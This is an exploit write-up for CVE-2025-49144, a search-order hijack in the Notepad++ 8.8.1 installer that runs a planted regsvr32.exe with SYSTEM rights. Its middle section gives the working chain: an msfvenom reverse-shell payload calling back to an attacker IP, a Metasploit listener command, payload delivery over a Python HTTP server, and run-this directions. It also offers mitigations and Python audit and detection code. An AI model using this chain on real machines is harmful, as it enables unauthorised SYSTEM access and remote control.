Weaponizing Path Search Hijacking – Enterprise-Grade Analysis of CVE-2025-49144
CVE-2025-49144 is a local privilege escalation vulnerability in the Windows installer for Notepad++ version 8.8.1, caused by unsafe invocation of the system utility regsvr32.exe without specifying an absolute path. When the installer attempts to register or unregister shell extension components, it calls regsvr32 by name, triggering Windows’ default executable search order.
This search order prioritizes the current working directory, enabling an adversary to plant a malicious regsvr32.exe alongside the installer. Upon execution, the installer unwittingly launches the attacker’s binary under elevated privileges, granting SYSTEM-level code execution.
Although exploitation requires local access to place the payload in the installer’s directory, the simplicity and reliability of the hijack make it a potent post-compromise escalation technique. It bypasses UAC prompts during installer execution and aligns with MITRE ATT&CK technique T1574.002 (Hijack Execution Flow: DLL Side-Loading/Binary Planting).
Mitigation demands updating to Notepad++ 8.8.2 or later, which hardcodes the system path for regsvr32.exe, as well as enforcing application allowlisting to block execution from non-trusted directories. Security teams should deploy telemetry to detect high-integrity processes spawning regsvr32.exe from unexpected locations, correlating with installer activity to identify malicious hijacks.
CVE-2025-49144 underscores the enduring risk of unqualified path usage in privileged processes and the critical importance of secure coding practices in software installation routines.
Impact of CVE-2025-49144:
• Silent Privilege Escalation: Allows attacker-supplied executables to run with SYSTEM privileges during Notepad++ installation, without prompting the user, by exploiting unqualified path resolution.
• Post-Compromise Escalation Vector: Provides a reliable means for low-privilege users or foothold malware to elevate privileges and gain full control over the host.
• Bypass of UAC and Installer Trust: Abuses the trusted Notepad++ installer process to execute malicious binaries, sidestepping User Account Control prompts and code-signing checks.
• Execution Chain Masquerading as Legitimate Activity: Executes attacker content through the installer’s normal process tree, making it appear indistinguishable from legitimate software setup activity to basic EDR rules.
• Potential for Domain-Wide Impact: When used on endpoints joined to a domain, enables privilege escalation that can be leveraged for lateral movement and broader network compromise.
The issue occurs because:
The issue in CVE-2025-49144 comes from the Notepad++ 8.8.1 installer calling regsvr32.exe without its full path. Because Windows searches the current folder first, a malicious regsvr32.exe placed alongside the installer will be run instead of the real one. This lets an attacker’s file execute with SYSTEM privileges, turning a normal install step into a privilege escalation point.
Environment and Setup:
• Target OS: Windows 11 Pro (x64), Version 23H2 (fully patched) – also reproducible on Windows 10 Pro 22H2
• Notepad++ Version: 8.8.1 (vulnerable installer)
• Payload: regsvr32.exe generated via msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4443 -f exe
• Payload Placement: Same directory as Notepad++ installer executable
• Attack Platform: Kali Linux 2024.x (attacker machine)
• Listener: Metasploit Framework (msfconsole) with exploit/multi/handler configured for above payload
• Windows Defender: Disabled real-time protection during testing to prevent payload removal
• Execution Method: Notepad++ installer launched from payload directory using double-click in File Explorer
• Privilege Context: Installer prompts for elevation; payload inherits SYSTEM-level token
• Detection Tool: Process event tracing via Windows Event Viewer (Event ID 4688) to verify payload execution path
• Manual Validation: Observed active Meterpreter session on Kali after installer run
• Confirmed Behavior: Malicious regsvr32.exe executed instead of legitimate system binary due to unqualified path call, resulting in SYSTEM shell
Validation Scope:
This analysis confirms that the target system is verifiably vulnerable to CVE-2025-49144. The proof-of-concept successfully replaced the intended system regsvr32.exe call during the Notepad++ 8.8.1 installation with a malicious binary placed in the same directory, resulting in execution under SYSTEM privileges. This behavior validates the presence of the unqualified path call flaw and proves that the installer’s execution chain can be hijacked locally.
While the test demonstration was performed on a controlled lab system and payload execution was limited to a reverse shell for validation purposes, the observed behavior confirms that the same vector can be weaponized in real-world environments. If paired with a staged malware loader or integrated into a post-compromise toolkit, this path hijacking could enable full privilege escalation on enterprise endpoints.
This validation emphasizes the need for immediate patching to Notepad++ 8.8.2 or later, strict enforcement of execution policies for user-writable locations, and deployment of telemetry rules to flag high-integrity processes invoking regsvr32.exe from non-system directories. Even without malicious code execution at the time of testing, the confirmed ability to redirect privileged process calls signals a systemic security gap requiring prompt remediation.
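One practical pre-execution control that follows from this validation: before a deployment script launches an installer from a user-writable folder, audit that folder for files whose names collide with system utilities the installer is known to call by bare name. The following is an added example written for this write-up, not code from the original post or from the Notepad++ project; the utility name list and the constructed demo directory are assumptions.

```python
import tempfile
from pathlib import Path

# Constructed list of system utilities an installer may call by bare name.
# Extend it from the actual installer's external calls (regsvr32.exe is the
# one CVE-2025-49144 hinges on).
SYSTEM_UTILITIES = {"regsvr32.exe", "msiexec.exe", "rundll32.exe",
                    "cmd.exe", "powershell.exe"}


def planted_binaries(install_dir, system_utilities=SYSTEM_UTILITIES):
    """Return file names in install_dir that collide with a system utility.

    Windows file names are case-insensitive, so the comparison lowercases
    each entry; a 'REGSVR32.exe' next to the installer is the exact
    precondition the write-up exploits.
    """
    found = [entry.name for entry in Path(install_dir).iterdir()
             if entry.is_file() and entry.name.lower() in system_utilities]
    return sorted(found)


def safe_to_run(installer_path):
    """Refuse to launch an installer whose own directory contains a planted
    copy of a system utility (that directory is searched before System32)."""
    return not planted_binaries(Path(installer_path).parent)


def make_demo_dir(plant=True):
    """Build a constructed folder mirroring the lab setup described above:
    the installer stub plus, optionally, a planted regsvr32.exe stub."""
    d = Path(tempfile.mkdtemp())
    (d / "npp.8.8.1.Installer.x64.exe").write_bytes(b"installer-stub")
    (d / "readme.txt").write_text("constructed sample, not a real installer")
    if plant:
        (d / "REGSVR32.exe").write_bytes(b"planted-stub")  # mixed case on purpose
    return d


if __name__ == "__main__":
    folder = make_demo_dir()
    print("planted:", planted_binaries(folder))
    print("safe to run:", safe_to_run(folder / "npp.8.8.1.Installer.x64.exe"))
```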
Architectural Deconstruction of CVE-2025-49144 in Windows Path Handling Logic:
1. Creating the Malicious Payload
On the Kali Linux attacker machine, a reverse TCP Meterpreter payload was generated using msfvenom. The payload was configured to connect back to the attacker’s IP (192.168.42.129) on port 4443 when executed.
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4443 -f exe -o regsvr32.exe
fig 01: the generated payload
2. Setting Up the Listener
#sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0;set LPORT 4443; set AutoRunScript post/windows/manage/migrate;run"
fig 02: the Metasploit listener
3. Sending the payload via local Python server
#python3 -m http.server 9000
fig 03: the Python HTTP server running
4. Downloading the Vulnerable Notepad++ Installer and regsvr32.exe
On the target Windows 11 machine, the Notepad++ 8.8.1 (x64) installer — the vulnerable version affected by CVE-2025-49144 — was downloaded directly from a trusted historical software archive or the official Notepad++ GitHub release page.
Download Notepad++ v8.8.1 from the official Notepad++ release page.
The installer file, typically named npp.8.8.1.Installer.x64.exe, was saved into the same folder as the malicious regsvr32.exe payload, which had been downloaded earlier from the Python HTTP server at http://<KaliIp>:9000.
At this stage, the folder contained:
npp.8.8.1.Installer.x64.exe (vulnerable installer)
regsvr32.exe (malicious payload)
The next step was to try installing Notepad++.
fig 04: the downloaded Notepad++ installer and regsvr32.exe in the same folder
This setup ensured that when the installer invoked regsvr32.exe without a full path, Windows would execute the attacker’s payload instead of the legitimate system binary.
Ensure regsvr32.exe (malicious payload) and npp.8.8.1.Installer.x64.exe are in the same folder.
On Windows, double-click the installer from inside that folder (do not run from another location).
The installer will prompt for elevation (UAC). Approve it.
As the installer runs, it calls regsvr32.exe without a full path — executing your malicious version.
On Kali, your Metasploit listener will catch a SYSTEM-level Meterpreter session.
5. Triggering the Exploit
With both the regsvr32.exe malicious payload and the npp.8.8.1.Installer.x64.exe vulnerable installer in the same folder, the exploit is triggered simply by launching the Notepad++ 8.8.1 installer from that directory.
When the installer runs, it automatically calls regsvr32.exe without using the full system path.
Because the malicious regsvr32.exe is in the same folder, Windows executes it instead of the legitimate one in C:\Windows\System32.
This results in the payload being executed with SYSTEM privileges, sending a reverse connection to the Metasploit listener on the attacker’s machine.
Once triggered, the listener on Kali will show an incoming Meterpreter session with NT AUTHORITY\SYSTEM privileges.
fig 05/06: when I run the Notepad++ installer, it automatically calls the fake regsvr32.exe created by the attacker.
Mitigation and Fixes
Apply Vendor Patch Immediately: Upgrade to Notepad++ 8.8.2 or later, where the installer explicitly calls the full system path for regsvr32.exe, closing the path hijacking vulnerability.
Restrict Execution from User-Writable Folders: Enforce application control policies (AppLocker, WDAC) to block execution of EXE files from directories like Downloads, Desktop, or Temp.
Harden Installer and Build Practices: Developers must always reference system binaries with absolute paths in installers to prevent search-order hijacking.
Enhance Detection Rules: Deploy EDR/SIEM alerts for high-integrity processes launching regsvr32.exe from any location outside C:\Windows\System32\.
Limit Local Write Access to Install Locations: Ensure folders used for software installation are write-protected from non-administrator accounts.
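The detection rule above, worked through as an added example (not code from the original post): it runs over constructed Security log Event ID 4688 records, flattened to key=value fields as a SIEM pipeline might deliver them, and flags regsvr32.exe launched from outside the system directories by a process holding an elevated token. It treats both System32 and SysWOW64 as legitimate homes for regsvr32.exe, since the 32-bit copy lives in the latter; the field layout and sample paths are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Both copies of the genuine regsvr32.exe; anything else is a planted binary.
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# 4688 TokenElevationType values: %%1936 = Default (full token, e.g. SYSTEM),
# %%1937 = Full (UAC-elevated), %%1938 = Limited (standard user token).
ELEVATED_TOKENS = {"%%1936", "%%1937"}

# Constructed sample events, not real telemetry.
SAMPLE_4688 = [
    "EventID=4688 NewProcessName=C:\\Windows\\System32\\regsvr32.exe "
    "ParentProcessName=C:\\Windows\\explorer.exe TokenElevationType=%%1938",
    "EventID=4688 NewProcessName=C:\\Users\\bob\\Downloads\\regsvr32.exe "
    "ParentProcessName=C:\\Users\\bob\\Downloads\\npp.8.8.1.Installer.x64.exe "
    "TokenElevationType=%%1937",
    "EventID=4688 NewProcessName=C:\\Windows\\SysWOW64\\regsvr32.exe "
    "ParentProcessName=C:\\Windows\\System32\\msiexec.exe TokenElevationType=%%1937",
    "EventID=4688 NewProcessName=C:\\Temp\\REGSVR32.EXE "
    "ParentProcessName=C:\\Temp\\setup.exe TokenElevationType=%%1936",
]

# key=value pairs; values may contain spaces, so stop only before the next key.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_4688(line):
    """Turn one flattened 4688 record into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def is_suspicious(event):
    """True when an elevated process image named regsvr32.exe runs from a
    directory other than System32/SysWOW64 (case-insensitive on Windows)."""
    if event.get("EventID") != "4688":
        return False
    image = PureWindowsPath(event.get("NewProcessName", ""))
    if image.name.lower() != "regsvr32.exe":
        return False
    elevated = event.get("TokenElevationType") in ELEVATED_TOKENS
    trusted = str(image.parent).lower() in TRUSTED_DIRS
    return elevated and not trusted


def find_hijacks(lines):
    """Return (image, parent) pairs for every suspicious record in lines."""
    hits = []
    for line in lines:
        ev = parse_4688(line)
        if is_suspicious(ev):
            hits.append((ev["NewProcessName"], ev.get("ParentProcessName", "?")))
    return hits
```

Sysmon Event ID 1 carries an explicit IntegrityLevel field and is the better source where available; the logic is the same with that field substituted for the token type.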
Conclusion
CVE-2025-49144 demonstrates how a simple installer misstep—calling a trusted system binary without its full path—can be turned into a high-impact privilege escalation vector. By exploiting Windows’ search-order behavior, attackers can coerce an elevated installer to run their malicious binary instead of the intended system file, achieving SYSTEM-level execution with minimal effort.
Our demonstration confirmed the exploit’s viability on fully patched, enterprise-grade Windows environments, underscoring that even modern systems can be compromised through overlooked operational assumptions in software installation routines.
This proof-of-concept reinforces the importance of absolute path usage, execution restrictions from user-writable locations, and active monitoring of privileged processes invoking binaries from non-standard paths.
Trust in execution flow is not a given—it must be designed, enforced, and validated.
Patch. Monitor. Validate. Relentlessly.